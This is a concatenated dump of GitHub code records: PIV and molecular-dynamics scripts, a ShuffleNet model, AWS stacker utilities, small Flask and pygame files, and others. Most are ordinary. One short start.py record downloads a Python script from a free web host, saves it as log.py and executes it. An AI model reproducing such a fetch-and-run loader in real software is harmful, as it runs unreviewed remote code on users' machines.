heure=heure)\n##Depuis un fichier hdf5\n#data = h5py_in_Data(ouverture_fichier(\"/home/ldupuy/Documents/Stage_Python_(2018)/new/20171109_1_frame.hdf5\"))\n###Création de Mesure et de ses sous-classes###\n##Création de Mesure\nmesure = m.Mesure(d)\n\n##Création de Piv3D\npiv3 = piv.Piv3D(d)\nmesure.add_measurement(piv3)\nt1 = time.time()\n#print(d.param.fx)\n#print(d.param.fps)\n#print(d.param.f)\noverlap = 16\nwindow_size = 32\n\npiv3 = piv3.analysis_multi_proc('', cinefile, cinefile, npy=None, fx='toto', dt_origin=None, frame_diff=None, crop_lims=None, maskers=None, window_size=window_size, overlap=overlap, search_area_size=window_size, save=False, s2n_thresh=1.2, bg_n_frames=None)\nt2 = time.time()\n###Mise des données dans un fichier HDF5###\n##Si le fichier est déjà crée :\n#f = ouverture_fichier(\"/home/ldupuy/Documents/Stage_Python_(2018)/new/Mesure_0_20171109_1_frame.hdf5\")\n##Pour créer le fichier\nf = h5py.file_name_in_dir(mesure, adresse_s)\nh5py.obj_in_h5py(mesure, f)\n\n\nprint(\"temps : \")\nprint(t2-t1)\n","repo_name":"PerrardCodes/databook","sub_path":"Lea/lea/exemple/exemple_piv3d.py","file_name":"exemple_piv3d.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3992246149","text":"import requests\n\n# Define the API endpoint URL\napi_url = \"https://udacity-salary-predictor-e0d91f043730.herokuapp.com/predict/\" # NOQA\n\n# Sample input data for model inference\ninput_data = {\n \"data\": [\n {\n \"age\": 46,\n \"workclass\": \"Private\",\n \"fnlgt\": 369538,\n \"education\": \"10th\",\n \"education_num\": 6,\n \"marital_status\": \"Married-civ-spouse\",\n \"occupation\": \"Transport-moving\",\n \"relationship\": \"Husband\",\n \"race\": \"White\",\n \"sex\": \"Male\",\n \"capital_gain\": 0,\n \"capital_loss\": 0,\n \"hours_per_week\": 40,\n \"native_country\": \"United-States\",\n },\n {\n \"age\": 45,\n \"workclass\": \"Private\",\n \"fnlgt\": 172274,\n \"education\": \"Doctorate\",\n \"education_num\": 16,\n \"marital_status\": \"Divorced\",\n \"occupation\": \"Prof-specialty\",\n \"relationship\": \"Unmarried\",\n \"race\": \"Black\",\n \"sex\": \"Female\",\n \"capital_gain\": 0,\n \"capital_loss\": 3004,\n \"hours_per_week\": 35,\n \"native_country\": \"United-States\",\n },\n {\n \"age\": 20,\n \"workclass\": \"Private\",\n \"fnlgt\": 44064,\n \"education\": \"Some-college\",\n \"education_num\": 10,\n \"marital_status\": \"Never-married\",\n \"occupation\": \"Prof-specialty\",\n \"relationship\": \"Own-child\",\n \"race\": \"White\",\n \"sex\": \"Male\",\n \"capital_gain\": 0,\n \"capital_loss\": 0,\n \"hours_per_week\": 25,\n \"native_country\": \"United-States\",\n },\n ]\n}\n\n# Send a POST request to the API\nresponse = requests.post(api_url, json=input_data)\n\n# Get the result and status code from the response\nresult = response.json()\nstatus_code = response.status_code\n\n# Print the results\nprint(\"Model Inference Result:\", result)\nprint(\"Status Code:\", status_code)\n","repo_name":"JitendraRVarma/deploy-ml-model-with-fastapi","sub_path":"post_request.py","file_name":"post_request.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7811997640","text":"class Dictionary:\n NOUN = \"N\"\n VERB = \"V\"\n ADJECTIVE = \"A\"\n PRONOUN = \"P\"\n ADVERB = \"R\"\n ADPOSITION = \"S\"\n CONJUCTION = \"C\"\n NUMERAL = \"M\"\n PARTICLE = \"Q\"\n INTERJECTION = \"I\"\n ABBRECIATION = \"Y\"\n RESIDUAL = \"X\"\n PUNCTUATION = \"Z\"\n \n @property\n def node_list(self):\n return self._node_list\n \n @property\n def edge_list(self):\n return self._edge_list\n \n @property\n def original_nominative_list(self):\n return self._original_nominative_list\n \n @property\n def nominative_original_list(self):\n return self._nominative_original_list\n \n @property\n def words_types(self):\n return self._words_types\n \n @property\n def all_types(self):\n return [\n Dictionary.NOUN,\n Dictionary.VERB,\n Dictionary.ADJECTIVE,\n Dictionary.PRONOUN,\n Dictionary.ADVERB,\n Dictionary.ADPOSITION,\n Dictionary.CONJUCTION,\n Dictionary.NUMERAL,\n Dictionary.PARTICLE,\n Dictionary.INTERJECTION,\n Dictionary.ABBRECIATION,\n Dictionary.RESIDUAL,\n Dictionary.PUNCTUATION\n ]\n \n # dictionary_path specifies relative path of file where marked words are \n def __init__(self, dictionary_path=None):\n self._dictionary_path = dictionary_path\n # mark column indexes in dictionary_path \n self._word_pos_idx = 0 # word position index column\n self._word_original_idx = 1 # original word column index\n self._word_type_idx = 2 # word type column index\n self._word_nominative_idx = 3 # word as nominative column index\n self._node_list = []\n self._edge_list = []\n self._original_nominative_list = []\n self._nominative_original_list = []\n self._words_types = []\n \n # sentences from which words will be compared in dictionary file.\n # wanted word types contains array of wanted types that will be extracted (nouns, verbs etc)\n def set_words_as_node_and_egde_list(self, sentences_list, word_types):\n dictionary_lines = None\n with open(self._dictionary_path, \"r\", encoding=\"utf-8\", errors = \"ignore\") as f:\n # read all dictionary\n dictionary_lines = f.readlines()\n \n # loop through sentences in text\n for sentence in sentences_list:\n # list that will store words that are found in dictionary and are valid type\n valid_words = []\n # loop thourhg each word in sentence text\n for word in sentence.split():\n # search for word in dictionary by looping through each line \n for dict_line in dictionary_lines:\n \n # split dictionary line into columns\n columns = dict_line.split()\n \n # if column contains anything \n if len(columns) > 0:\n # check if dictionary word has valid type and sentence contains word from dictionary\n if self.__is_valid_type(columns, word_types) and word == columns[self._word_original_idx]:\n nominative = columns[self._word_nominative_idx]\n # if word is valid, get it as nominative from dictionary\n valid_words.append(nominative) \n \n self._original_nominative_list.append((word, nominative))\n self._nominative_original_list.append((nominative, word))\n self._words_types.append((word, columns[self._word_type_idx][0]))\n break \n \n # if sentence contains only one valid word, add it to node list\n if len(valid_words) == 1:\n self._node_list.append(valid_words[0])\n # sentence contains more than one one valid word, add it to edge list\n else: \n # gets edge list as dictionary where preceding word is key and every word after is value\n for linked_words in self.__get_edge_list_for_sentence(valid_words):\n # if key and value doesn't have same value then add it to edge list. Same word cannot be linked to itself\n if linked_words[0] != linked_words[1]:\n self._edge_list.append(linked_words)\n else:\n # if key/value are same then add it as node\n self._node_list.append(linked_words[0])\n\n # add weights do node list where every time same pair words appear, their weight is incremented by 1.0\n def set_edge_list_as_weighted_edges(self, weight_value = 1.0):\n # temporary list which will containt distinct edge list and \n # each element will be tuple in format (edge.key, edge.value, weight)\n tmp_weight_list = []\n \n for edge in self.edge_list:\n # flag to test if edge list item is already added to tmp_list\n found = False\n # index of temp item\n tmp_idx = 0\n for tmp_item in tmp_weight_list:\n # if key/value from orig list match with temp list (item is already added to temp list)\n if edge == (tmp_item[0], tmp_item[1]):\n # tuple objects are immutable so assignment to one element is not possible, \n # then whole tuple item must be replaced and weight is incremented by weight_value\n tmp_weight_list[tmp_idx] = (tmp_item[0], tmp_item[1], tmp_item[2] + weight_value)\n found = True\n break\n # increment temp item index if not found\n tmp_idx +=1\n # if edge item is not added to temp list\n if not found:\n # add edge item to temp list with default weight value\n tmp_weight_list.append((edge[0], edge[1], weight_value))\n \n self._edge_list = tmp_weight_list\n \n def __is_valid_type(self, dictionary_column, wanted_word_types):\n # check if cell has content and check that first letter in cell marks wanted word type\n return (dictionary_column[self._word_type_idx][0] in wanted_word_types)\n \n def __sentence_contains(self, sentence, dictionary_column):\n return (dictionary_column[self._word_original_idx] in sentence.split())\n \n def __get_edge_list_for_sentence(self, words):\n edge_dict = []\n \n for i in range(0, len(words) - 2):\n for j in range(i + 1, len(words) - 1):\n edge_dict.append((words[i], words[j]))\n \n return edge_dict\n ","repo_name":"rcvjet15/networkx-text-summary","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6676489467","text":"#!/data/data/com.termux/files/usr/bin/python3.8\n\nimport requests\nfrom os import system\n\na = requests.get('https://friend3ds.000webhostapp.com/test/test.py')\n\nwith open('log.py', 'w+') as log:\n log.write(a.text)\n\nsystem('clear')\nsystem('python log.py')\n","repo_name":"shetel/tool_market","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23914536704","text":"# encoding: utf-8\n# from https://github.com/tinyalpha/shuffleNet-cifar10\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass idenUnit(nn.Module):\n def __init__(self, input_channel, g):\n super(idenUnit, self).__init__()\n\n # bottle neck channel = input channel / 4, as the paper did\n neck_channel = int(input_channel / 4)\n\n # conv layers, GConv - (shuffle) -> DWConv -> Gconv\n # bn, relu bn bn\n self.gconv1 = nn.Conv2d(input_channel, neck_channel, groups = g, kernel_size = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(neck_channel)\n\n self.dwconv = nn.Conv2d(neck_channel, neck_channel, groups = neck_channel, kernel_size = 3, \n padding = 1, bias = False)\n self.bn = nn.BatchNorm2d(neck_channel)\n\n self.gconv2 = nn.Conv2d(neck_channel, input_channel, groups = g, kernel_size = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(input_channel)\n\n # for channel shuffle operation \n self.g, self.n = g, neck_channel//g\n assert self.n == int(self.n), \"wrong shape to shuffle\"\n\n\n def forward(self, inputs):\n x = F.relu(self.bn1(self.gconv1(inputs)))\n \n # channel shuffle\n n, c, w, h = x.shape\n x = x.view(n, self.g, self.n, w, h)\n x = x.transpose_(1, 2).contiguous()\n x = x.view(n, c, w, h)\n\n x = self.bn(self.dwconv(x))\n x = self.bn2(self.gconv2(x))\n\n return F.relu(x + inputs)\n\n\nclass poolUnit(nn.Module):\n def __init__(self, input_channel, output_channel, g, first_group = True, downsample = True):\n super(poolUnit, self).__init__()\n self.downsample = downsample\n\n # bottle neck channel = input channel / 4, as the paper did\n neck_channel = int(output_channel / 4)\n\n # conv layers, GConv - (shuffle) -> DWConv -> Gconv\n # bn,relu bn bn\n if first_group:\n self.gconv1 = nn.Conv2d(input_channel, neck_channel, groups = g, kernel_size = 1, bias = False)\n else:\n self.gconv1 = nn.Conv2d(input_channel, neck_channel, kernel_size = 1, bias = False)\n \n self.bn1 = nn.BatchNorm2d(neck_channel)\n\n stride = 2 if downsample else 1\n self.dwconv = nn.Conv2d(neck_channel, neck_channel, groups = neck_channel, stride = stride, kernel_size = 3, \n padding = 1, bias = False)\n self.bn = nn.BatchNorm2d(neck_channel)\n\n self.gconv2 = nn.Conv2d(neck_channel, output_channel - input_channel, groups = g, kernel_size = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(output_channel - input_channel)\n\n # for channel shuffle operation \n self.g, self.n = g, neck_channel//g\n assert self.n == int(self.n), \"error shape to shuffle\"\n\n\n def forward(self, inputs):\n x = F.relu(self.bn1(self.gconv1(inputs)))\n \n # channel shuffle\n n, c, w, h = x.shape\n # print(n, c, w, h)\n x = x.view(n, self.g, self.n, w, h)\n x = x.transpose_(1, 2).contiguous()\n x = x.view(n, c, w, h)\n\n x = self.bn(self.dwconv(x))\n x = self.bn2(self.gconv2(x))\n\n shortcut = F.avg_pool2d(inputs, 2) if self.downsample else inputs\n return F.relu(torch.cat((x, shortcut), dim = 1))\n\n\nclass ShuffleNet(nn.Module):\n def __init__(self, output_size, scale_factor = 1, g = 8):\n super(ShuffleNet, self).__init__()\n self.g = g\n # self.cs = {1: 144, 2: 200, 3: 240, 4: 272, 8: 384}\n self.cs = {1: 144, 2: 200, 3: 240, 4: 272, 8: 384}\n\n # compute output channels for stages\n c2 = self.cs[self.g]\n c2 = int(scale_factor * c2)\n c3, c4 = 2*c2, 4*c2\n\n # first conv layer & last fc layer\n self.conv1 = nn.Conv2d(3, 24, kernel_size = 3, padding = 1, stride = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(24)\n\n self.fc = nn.Linear(c4, output_size)\n\n # build stages\n self.stage2 = self.build_stage(24, c2, repeat_time = 3, first_group = False, downsample = False)\n self.stage3 = self.build_stage(c2, c3, repeat_time = 7)\n self.stage4 = self.build_stage(c3, c4, repeat_time = 3)\n\n # weights init\n self.weights_init()\n\n\n def build_stage(self, input_channel, output_channel, repeat_time, first_group = True, downsample = True):\n stage = [poolUnit(input_channel, output_channel, self.g, first_group = first_group, downsample = downsample)]\n \n for i in range(repeat_time):\n stage.append(idenUnit(output_channel, self.g))\n\n return nn.Sequential(*stage) \n\n\n\n def weights_init(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\n def forward(self, inputs):\n\n # first conv layer\n x = F.relu(self.bn1(self.conv1(inputs)))\n # x = F.max_pool2d(x, kernel_size = 3, stride = 2, padding = 1)\n # assert x.shape[1:] == torch.Size([24,56,56])\n\n # bottlenecks\n x = self.stage2(x)\n x = self.stage3(x)\n x = self.stage4(x)\n # print(x.shape)\n\n # global pooling and fc (in place of conv 1x1 in paper)\n x = F.adaptive_avg_pool2d(x, 1)\n x = x.view(x.shape[0], -1)\n x = self.fc(x)\n\n return x","repo_name":"nlsde-safety-team/DefensivePatch","sub_path":"models/shufflenet.py","file_name":"shufflenet.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"41708219671","text":"import gzip\nimport collections\nimport json\nimport os\n\n__vocabulary_search_paths=[\n os.path.dirname(os.path.realpath(__file__)) + '/vocabularies/{}',\n '{}',\n os.getcwd() + '/{}',\n os.getenv('HOME') + '/.fakr/{}',\n]\n\ndef write(fp, data: collections.Sequence) -> None:\n jsoned=json.dumps(data).encode()\n gzipped=gzip.compress(bytes(jsoned))\n\n fp.write(gzipped)\n\n\ndef read(fp) -> collections.Sequence:\n gzipped=fp.read()\n jsoned=gzip.decompress(gzipped).decode()\n\n return json.loads(jsoned)\n\n\ndef search(file: str) -> str:\n for p in __vocabulary_search_paths:\n guess=os.path.realpath(p.format(file))\n if os.path.isfile(guess):\n return guess\n\n return file\n","repo_name":"l-x/fakr","sub_path":"fakr/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3135852372","text":"# ping_controller.py\n\n\nfrom flask import Blueprint\nfrom flask_restx import Resource, Api, Namespace\n\napi = Namespace('ping', description=\"Sanity check endpoint\")\n\n\n@api.route('/')\nclass Ping(Resource):\n\n def get(self):\n return {\n 'status': 'success',\n 'message': 'pong!'\n }\n","repo_name":"toehmler/seshn","sub_path":"seshn-server/src/api/ping/ping_controller.py","file_name":"ping_controller.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18327438985","text":"\"\"\"\n给定一个m*n的二维列表,查找一个数是否存在,列表的如下特性:\n* 每一行的列表都是从左到右已经排好的\n* 每一行的第一个数字比上一行最后一个数字都大\n\"\"\"\n\n# # 第一种方法\n# class Solution:\n# def searchMatrix(self,matrix,target):\n# \"\"\"\n# :param matrix: list[list[int]]\n# :param target: int\n# :return: bool\n# \"\"\"\n# for line in matrix:\n# # 注意这个in的时间复杂度是O(n),整体的时间复杂度是O(n^2)\n# if target in line:\n# return True\n# else:\n# return False\n\n\nclass Solution:\n def searchMatrix(self,matrix,target):\n \"\"\"\n :param matrix: list[list[int]]\n :param target: int\n :return: bool\n \"\"\"\n h = len(matrix)\n if h == 0:\n return False # []\n w = len(matrix[0])\n if w == 0:\n return False\n left = 0\n right = w*h-1\n while left <= right:\n mid = (left+right)//2\n # 对mid的数值转化成二维列表中数值的真是存在\n i = mid // w\n j = mid % w\n if matrix[i][j] == target:\n return True\n elif matrix[i][j] >target:\n right = mid-1\n else:\n left = mid+1\n else:\n return False\n\na = [[1,2,3,4],[5,6,7,8],[9,10,12,14]]\ns = Solution()\nprint(s.searchMatrix(a,13))","repo_name":"waws520waws/the-god-of-algorithms","sub_path":"数据结构查找_排序的习题/二维列表_查数字是否存在.py","file_name":"二维列表_查数字是否存在.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2041197133","text":"import importlib\nimport logging\nimport re\nimport sys\nimport time\n\nfrom boto.route53.record import ResourceRecordSets\n\nlogger = logging.getLogger(__name__)\n\n\ndef retry_with_backoff(function, args=None, kwargs=None, attempts=5,\n min_delay=1, max_delay=3, exc_list=None,\n retry_checker=None):\n \"\"\"Retries function, catching expected Exceptions.\n\n Each retry has a delay between `min_delay` and `max_delay` seconds,\n increasing with each attempt.\n\n Args:\n function (function): The function to call.\n args (Optional(list)): A list of positional arguments to pass to the\n given function.\n kwargs (Optional(dict)): Keyword arguments to pass to the given\n function.\n attempts (Optional(int)): The # of times to retry the function.\n Default: 5\n min_delay (Optional(int)): The minimum time to delay retries, in\n seconds. Default: 1\n max_delay (Optional(int)): The maximum time to delay retries, in\n seconds. Default: 5\n exc_list (Optional(list)): A list of :class:`Exception` classes that\n should be retried. Default: [:class:`Exception`,]\n retry_checker (Optional(func)): An optional function that is used to\n do a deeper analysis on the received :class:`Exception` to\n determine if it qualifies for retry. Receives a single argument,\n the :class:`Exception` object that was caught. Should return\n True if it should be retried.\n\n Returns:\n variable: Returns whatever the given function returns.\n\n Raises:\n :class:`Exception`: Raises whatever exception the given function\n raises, if unable to succeed within the given number of attempts.\n \"\"\"\n args = args or []\n kwargs = kwargs or {}\n attempt = 0\n if not exc_list:\n exc_list = (Exception, )\n while True:\n attempt += 1\n logger.debug(\"Calling %s, attempt %d.\", function, attempt)\n sleep_time = min(max_delay, min_delay * attempt)\n try:\n return function(*args, **kwargs)\n except exc_list as e:\n # If there is no retry checker function, or if there is and it\n # returns True, then go ahead and retry\n if not retry_checker or retry_checker(e):\n if attempt == attempts:\n logger.error(\"Function %s failed after %s retries. Giving \"\n \"up.\", function.func_name, attempts)\n raise\n logger.debug(\"Caught expected exception: %r\", e)\n # If there is a retry checker function, and it returned False,\n # do not retry\n else:\n raise\n time.sleep(sleep_time)\n\n\ndef camel_to_snake(name):\n \"\"\"Converts CamelCase to snake_case.\n\n Args:\n name (string): The name to convert from CamelCase to snake_case.\n\n Returns:\n string: Converted string.\n \"\"\"\n s1 = re.sub(\"(.)([A-Z][a-z]+)\", r\"\\1_\\2\", name)\n return re.sub(\"([a-z0-9])([A-Z])\", r\"\\1_\\2\", s1).lower()\n\n\ndef convert_class_name(kls):\n \"\"\"Gets a string that represents a given class.\n\n Args:\n kls (class): The class being analyzed for its name.\n\n Returns:\n string: The name of the given kls.\n \"\"\"\n return camel_to_snake(kls.__name__)\n\n\ndef create_route53_zone(conn, zone_name):\n \"\"\"Creates the given zone_name if it doesn't already exists.\n\n Also sets the SOA negative caching TTL to something short (300 seconds).\n\n Args:\n conn (:class:`boto.route53.Route53Connection`): The connection used\n to interact with Route53's API.\n zone_name (string): The name of the DNS hosted zone to create.\n \"\"\"\n if not zone_name.endswith(\".\"):\n zone_name += \".\"\n zone = conn.get_zone(zone_name)\n if not zone:\n logger.debug(\"Zone %s does not exist, creating.\", zone_name)\n zone = conn.create_zone(zone_name)\n # Update SOA to lower negative caching value\n soa = zone.find_records(zone_name, \"SOA\")\n old_soa_body = soa.resource_records[0]\n old_soa_parts = old_soa_body.split(\" \")\n # If the negative cache value is already 300, don't update it.\n if old_soa_parts[-1] == \"300\":\n return\n logger.debug(\"Updating negative caching value on zone %s to 300.\",\n zone_name)\n new_soa_body = \" \".join(old_soa_body.split(\" \")[:-1]) + \" 300\"\n changes = ResourceRecordSets(conn, zone.id)\n delete_soa = changes.add_change(\"DELETE\", zone.name, \"SOA\", soa.ttl)\n delete_soa.add_value(old_soa_body)\n create_soa = changes.add_change(\"CREATE\", zone.name, \"SOA\", soa.ttl)\n create_soa.add_value(new_soa_body)\n changes.commit()\n\n\ndef load_object_from_string(fqcn):\n \"\"\"Converts \".\" delimited strings to a python object.\n\n Given a \".\" delimited string representing the full path to an object\n (function, class, variable) inside a module, return that object. Example:\n\n load_object_from_string(\"os.path.basename\")\n load_object_from_string(\"logging.Logger\")\n load_object_from_string(\"LocalClassName\")\n \"\"\"\n module_path = \"__main__\"\n object_name = fqcn\n if \".\" in fqcn:\n module_path, object_name = fqcn.rsplit(\".\", 1)\n importlib.import_module(module_path)\n return getattr(sys.modules[module_path], object_name)\n\n\ndef uppercase_first_letter(s):\n \"\"\"Return string \"s\" with first character upper case.\"\"\"\n return s[0].upper() + s[1:]\n\n\ndef cf_safe_name(name):\n \"\"\"Converts a name to a safe string for a Cloudformation resource.\n\n Given a string, returns a name that is safe for use as a CloudFormation\n Resource. (ie: Only alphanumeric characters)\n \"\"\"\n alphanumeric = r\"[a-zA-Z0-9]+\"\n parts = re.findall(alphanumeric, name)\n return \"\".join([uppercase_first_letter(part) for part in parts])\n\n\n# TODO: perhaps make this a part of the builder?\ndef handle_hooks(stage, hooks, region, context):\n \"\"\" Used to handle pre/post_build hooks.\n\n These are pieces of code that we want to run before/after the builder\n builds the stacks.\n\n Args:\n stage (string): The current stage (pre_run, post_run, etc).\n hooks (list): A list of dictionaries containing the hooks to execute.\n region (string): The AWS region the current stacker run is executing\n in.\n context (:class:`stacker.context.Context`): The current stacker\n context.\n \"\"\"\n if not hooks:\n logger.debug(\"No %s hooks defined.\", stage)\n return\n\n hook_paths = []\n for i, h in enumerate(hooks):\n try:\n hook_paths.append(h[\"path\"])\n except KeyError:\n raise ValueError(\"%s hook #%d missing path.\" % (stage, i))\n\n logger.info(\"Executing %s hooks: %s\", stage, \", \".join(hook_paths))\n for hook in hooks:\n required = hook.get(\"required\", True)\n kwargs = hook.get(\"args\", {})\n try:\n method = load_object_from_string(hook[\"path\"])\n except (AttributeError, ImportError):\n logger.exception(\"Unable to load method at %s:\", hook[\"path\"])\n if required:\n raise\n continue\n try:\n result = method(\n region,\n context.namespace,\n context.mappings,\n context.parameters,\n **kwargs\n )\n except Exception:\n logger.exception(\"Method %s threw an exception:\", hook[\"path\"])\n if required:\n raise\n continue\n if not result:\n if required:\n logger.error(\"Required hook %s failed. Return value: %s\",\n hook[\"path\"], result)\n sys.exit(1)\n logger.warning(\"Non-required hook %s failed. Return value: %s\",\n hook[\"path\"], result)\n","repo_name":"chrishenry/stacker","sub_path":"stacker/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"5776800218","text":"#This script is to check for violations of the minimum image convention\n\nimport MDAnalysis as mda\nimport numpy as np\n\n\nprint('Enter your .gro file name:')\ngro_file = input()\n\nu=mda.Universe('TMD_KET_POPC.gro') \nprot=u.select_atoms('protein') \n\nprot_x=[]\nprot_y=[]\nprot_z=[]\n\n#obtain all coordinates in x,y and z for the protein and store in\n#repsective individual arrays\nfor shmleh in prot.positions:\n prot_x.append(shmleh[0])\n prot_y.append(shmleh[1])\n prot_z.append(shmleh[2])\n\n#extract the PBC coordinates from the last line of the gro file of interest\nwith open(gro_file) as f:\n for line in f:\n pass\n last_line = line\n\n#as these coordinates are extracted initially as a string, in the following lines\n#you are converting this to a float for each x,y,z of the pbc\n#Multiply by 10 to convert from nm to angstrom unit.\npbc=str.split(last_line)\npbc_x=np.float(pbc[0])*10\npbc_y=np.float(pbc[1])*10\npbc_z=np.float(pbc[2])*10\n\n#by taking the difference between the largest and smallest coordinate in x,y and z\n#you can obtain the dimensions of the protein\nprot_x_length=max(prot_x)-min(prot_x)\nprot_y_length=max(prot_y)-min(prot_y)\nprot_z_length=max(prot_z)-min(prot_z)\n\n#the difference between the dimensions of the protein and the PBC box\n#gives you the size of the buffer in each direction.\nx_buffer=prot_x_length-pbc_x\ny_buffer=prot_y_length-pbc_y\nz_buffer=prot_z_length-pbc_z\n\nprint(x_buffer)\nprint(y_buffer)\nprint(z_buffer)\n\n","repo_name":"Maxim-93/simulation_setup_scripts","sub_path":"min_img_con.py","file_name":"min_img_con.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19362790328","text":"num = input(\n 'Opa fala ai meu consagrado, preciso de um número inteiro, me diga um: '\n)\n\nif not num.isnumeric():\n print(\n 'O numero não é inteiro'\n )\nelse:\n num = int(num)\n if num % 2 == 0:\n print(\n 'O número é par'\n )\n elif num % 2 != 0:\n print(\n 'O número é ímpar'\n )\n\n","repo_name":"GabsDsgn/Python-Exercicios","sub_path":"Pacote Download/CursoemVideo/Mundo 1/ex028.py","file_name":"ex028.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25995886628","text":"def main(x): #having x as a parameter allows for smooth transition between pages\r\n ##### set up #####\r\n import pygame\r\n import constants\r\n import buttons\r\n import main_menu\r\n import random\r\n pygame.init()\r\n\r\n red = random.randint(50, 200)\r\n green = random.randint(50, 200) #not colour blind friendly\r\n blue = random.randint(50, 200)\r\n\r\n # (self, name, size_x, size_y, coor_x, coor_y, img) = arguments for creating 'ImgButton' instance\r\n main_menu_button = buttons.ImgButton(44, 44, constants.WIDTH//2 - 22, 27, 'home (Dave Gandy).png') # main menu button setup\r\n # Icon made by Dave Gandy from www.flaticon.com\r\n\r\n main_menu_icon = buttons.ImgButton(44, 44, 200, 280, 'home (Dave Gandy).png')\r\n main_menu_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #main_menu_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n settings_icon = buttons.ImgButton(44, 44, 200, 350, 'settings (dmitri13).png')\r\n settings_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #settings_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n account_icon = buttons.ImgButton(44, 44, 150, 350, 'user (dmitri13).png')\r\n account_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #account_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n leaderboard_icon = buttons.ImgButton(44, 44, 100, 350, 'trophy (dmitri13).png')\r\n leaderboard_icon.set_colour([red, green, blue]) #not colour blind friendly\r\n #leaderboard_icon.set_colour(constants.DARK_ORANGE)\r\n\r\n clock = pygame.time.Clock() #variables\r\n running = True\r\n mouse_pressed = False\r\n mouse_timer = 0\r\n goto_main = False #if these are set to True, when this loop ends that menu will be started.\r\n\r\n screen = constants.screen\r\n pygame.display.set_caption(\"Hurry!\")\r\n my_icon = constants.my_icon\r\n background = constants.background\r\n pygame.display.set_icon(my_icon)\r\n\r\n Title = constants.font65.render('(credits)', True, constants.WHITE)\r\n TitleRect = Title.get_rect()\r\n TitleRect.center = (constants.WIDTH / 2, 150)\r\n\r\n Dave_Gandy = \"Icon provided by 'Dave Gandy' from 'www.flaticon.com'\"\r\n Dave_Gandy_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Dave_Gandy, True, constants.RED)\r\n Dave_Gandy_titleRect = Dave_Gandy_title.get_rect()\r\n Dave_Gandy_titleRect.center = (414, 280)\r\n\r\n Dmitri13 = \"Icons provided by 'Dmitri13' from 'www.flaticon.com'\"\r\n Dmitri13_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Dmitri13, True, constants.RED)\r\n Dmitri13_titleRect = Dmitri13_title.get_rect()\r\n Dmitri13_titleRect.center = (410, 350)\r\n\r\n Nearoo = \"Text input boxes used text input library provided by 'Nearoo' on Github.\"\r\n Nearoo_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Nearoo, True, constants.RED)\r\n Nearoo_titleRect = Nearoo_title.get_rect()\r\n Nearoo_titleRect.center = (constants.WIDTH//2, 400)\r\n\r\n Alucard = \"Background provided by 'Alucard' on 'https://opengameart.org/content/city-background-repetitive-3.'\"\r\n Alucard_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Alucard, True, constants.RED)\r\n Alucard_titleRect = Alucard_title.get_rect()\r\n Alucard_titleRect.center = (constants.WIDTH//2, 430)\r\n\r\n FoxSynergy = \"BGM provided by 'FoxSynergy' on 'https://opengameart.org/content/blue-space.'\"\r\n FoxSynergy_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(FoxSynergy, True, constants.RED)\r\n FoxSynergy_titleRect = FoxSynergy_title.get_rect()\r\n FoxSynergy_titleRect.center = (constants.WIDTH//2, 460)\r\n\r\n Fupi = \"Button sfx provided by 'Fupi' on 'https://opengameart.org/content/8bit-menu-select.'\"\r\n Fupi_title = pygame.font.SysFont('OCR A EXTENDED', 12).render(Fupi, True, constants.RED)\r\n Fupi_titleRect = Fupi_title.get_rect()\r\n Fupi_titleRect.center = (constants.WIDTH//2, 490)\r\n\r\n ##### game loop #####\r\n while running:\r\n\r\n ##### get events #####\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n print(\"User asked to quit.\")\r\n running = False\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_pressed = True\r\n print(\"Mouse clicked\")\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if mouse_pressed == True:\r\n mouse_timer = round(mouse_timer, 4)\r\n print(\"User held mouse for \" + str(mouse_timer) + \" seconds.\")\r\n 